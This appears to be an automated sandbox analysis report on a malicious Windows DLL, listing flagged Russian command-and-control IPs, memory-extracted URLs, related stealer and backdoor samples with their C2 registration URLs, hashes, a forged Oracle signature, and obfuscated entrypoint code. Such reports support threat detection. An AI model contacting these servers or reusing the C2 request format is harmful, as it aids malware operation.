http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://	0%	Avira URL Cloud	safe
http://77.238.250.123	0%	Avira URL Cloud	safe
http://77.238.224.56/	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1Go-http	0%	Avira URL Cloud	safe
http://195.2.70.38http://91.142.74.28	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80X-Content-Type-OptionsTra	0%	Avira URL Cloud	safe
http://91.142.74.28Go-http-client/1.1Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingGo-htt	0%	Avira URL Cloud	safe
http://91.142.74.28Go-http-client/1.1http://77.238.224.56	0%	Avira URL Cloud	safe
http://77.238.250.123http://195.2.70.38	0%	Avira URL Cloud	safe
http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://91.142.74.28User-Agent:	0%	Avira URL Cloud	safe
http://91.142.74.28http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80	0%	Avira URL Cloud	safe
http://195.2.70.38http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://91.142.74.28/	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80http://195.2.70.38P	0%	Avira URL Cloud	safe
http://195.2.70.38P	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1P	0%	Avira URL Cloud	safe
http://195.2.70.38	0%	Avira URL Cloud	safe
http://195.2.70.38Go-http-client/1.1http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://195.2.70.38Go-http-client/1.1Go-http-client/1.1PM	0%	Avira URL Cloud	safe
http://91.142.74.28	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://77.238.229.63/	true	Avira URL Cloud: safe	unknown
http://195.2.70.38/	true	Avira URL Cloud: safe	unknown
http://77.238.250.123/	true	Avira URL Cloud: safe	unknown
http://77.238.224.56/	true	Avira URL Cloud: safe	unknown
http://91.142.74.28/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://77.238.224.56PM	rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP	rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38PM	rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28Go-http-client/1.1http://77.238.224.56Go-http-client/1.1http://195.2.70.38http://	rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1PM	rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80User-Agent:	rundll32.exe, 00000006.00000002.3802641816.000000000D206000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80P	rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28http://77.238.224.56X-Content-Type-OptionsTransfer-EncodingGo-http-client/1.1http	rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1	rundll32.exe, 00000005.00000002.3802390448.000000000D50A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1P	rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80PM	rundll32.exe, 00000005.00000002.3802390448.000000000D50A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56	rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28Go-http-client/1.1PM	rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP	rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.63	rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://	rundll32.exe, 0000000C.00000002.3802972667.000000000CD92000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123	rundll32.exe, 0000000C.00000002.3802972667.000000000CDC6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE4F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1Go-http	rundll32.exe, 00000006.00000002.3802641816.000000000D206000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28Go-http-client/1.1http://77.238.224.56	rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38http://91.142.74.28	rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123http://195.2.70.38	rundll32.exe, 00000006.00000002.3802641816.000000000D182000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE4F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80X-Content-Type-OptionsTra	rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28Go-http-client/1.1Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingGo-htt	rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28User-Agent:	rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80	rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28PM	rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38http://91.142.74.28PM	rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38P	rundll32.exe, 00000005.00000002.3802390448.000000000D50A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80	rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80http://195.2.70.38P	rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1P	rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1Go-http-client/1.1PM	rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1http://91.142.74.28PM	rundll32.exe, 0000000C.00000002.3802972667.000000000CD92000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28	rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38	rundll32.exe, 0000000C.00000002.3802972667.000000000CDC6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE4F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.142.74.28	unknown	Russian Federation	48720	VTSL1-ASRU	true
77.238.229.63	unknown	Russian Federation	42429	TELERU-ASRU	true
195.2.70.38	unknown	Russian Federation	48282	VDSINA-ASRU	true
77.238.250.123	unknown	Russian Federation	42429	TELERU-ASRU	true
77.238.224.56	unknown	Russian Federation	42429	TELERU-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1473486
Start date and time:	2024-07-15 12:41:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.dll
Detection:	MAL
Classification:	mal72.evad.winDLL@14/0@0/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target loaddll32.exe, PID 6324 because there are no executed function
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: file.dll

Simulations

Behavior and APIs

Time	Type	Description
06:42:27	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.142.74.28	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	bhRtw44WV3.exe	Get hash	malicious	Poverty Stealer	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0CYm.9662PDr&md5=961e093be1f666fd38602ad90a5f480f&proxyPassword=CUjwiIZp&proxyUsername=tBwOAm0o&userId=hXHxeGYAr82LuiLpmAj6akbXlyrYizStkSiutlGJowFqlmFQ%40tGqp4yhrpjRoEF4tsJ6o35dnEyw.K3JmgSoewFL
77.238.229.63	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
195.2.70.38	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	Image is copyrighted.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0ZQk.wWJ2fdm&md5=f98035f22fcf11f0517bd800a8f92ca7&proxyPassword=R9iFXF6P&proxyUsername=Ul0u22aL&userId=i6cYnot2vd9Mo2PxiZ5jirphnl7Ccgwt20zY0iDM2ASS4lu9
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	heic.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
	ChOQ8w8NqZ.exe	Get hash	malicious	Unknown	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELERU-ASRU	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	77.238.224.56
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.224.56
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
VTSL1-ASRU	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.73.198
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	bhRtw44WV3.exe	Get hash	malicious	Poverty Stealer	Browse	91.142.74.28
TELERU-ASRU	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	77.238.224.56
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.224.56
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
VDSINA-ASRU	file.dll	Get hash	malicious	Unknown	Browse	62.113.116.83
	file.dll	Get hash	malicious	Unknown	Browse	94.103.90.9
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	195.2.76.207
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	5uKDxM17pT.exe	Get hash	malicious	AveMaria, UACMe	Browse	109.234.38.71
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	195.2.71.70
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	195.2.71.70
	FpbdV1sU4k.exe	Get hash	malicious	Unknown	Browse	195.2.71.70
	setup.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	195.2.71.70

File type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.902787372673727
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.dll
File size:	13'860'360 bytes
MD5:	e6743e380f2418b616dca113dbbc93cb
SHA1:	6c051a6d3a183c24292d6821865a5a183b4ebb9c
SHA256:	eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
SHA512:	99f35577b520efd679179c3bc3996499daf895fdb17d0fd20960acd65caec9ba5ed6c7bdeaefe0229f753658fb88f11594c8160fab57ac8ebc1a77a729e6abdd
SSDEEP:	196608:DDErb7pO6pV9Mqhdq3PusYB8NggX4WR+2EZ1hggBMY+gj7LWWtYH4c3nUOTBDAaX:DmUSDBYSBIoM5Shgg+dW64cXUoBDAaX
TLSH:	52D633D22FC741EAD5D209B4E31767D707F3945A8EC688343A8D3542B061FB3A1AEC66
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b...Y........N...,l.........................P....../.....@... .....................T.y.a..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x6d4859d0
Entrypoint Section:	.rdata2
Digitally signed:	true
Imagebase:	0x6c2c0000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x6da62f8c, 0x6c7abd60, 0x6c7abd10
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6c871eb5afcc648e749d578ab8277277

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/12/2013 19:00:00 22/12/2016 18:59:59
Subject Chain	CN=Oracle Corporation, OU=VirtualBox, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Oracle Corporation, L=Redwood Shores, S=California, C=US
Version:	3
Thumbprint MD5:	50BFA74751D185A89CCB20B4301B4AAE
Thumbprint SHA-1:	7E92B66BE51B79D8CE3FF25C15C2DF6AB8C7F2F2
Thumbprint SHA-256:	59B96B88E47C42FB42BBA1C6FC05BBDF24CA16A91507D633BAFBB39757F7339E
Serial:	51CA009816FDBD80F120E015EE75823E

Entrypoint Preview

Instruction
push ebp
pushfd
mov ebp, 6B9318BCh
shr ebp, 42h
bswap ebp
mov ebp, dword ptr [esp+ebp*2-5F8DC830h]
mov dword ptr [esp+04h], 168EA86Dh
push dword ptr [esp+00h]
popfd
lea esp, dword ptr [esp+04h]
call 00007FF691BEBCE2h
inc eax
mov eax, edx
neg byte ptr [esp+02h]
ror word ptr [esp+15h], 0049h
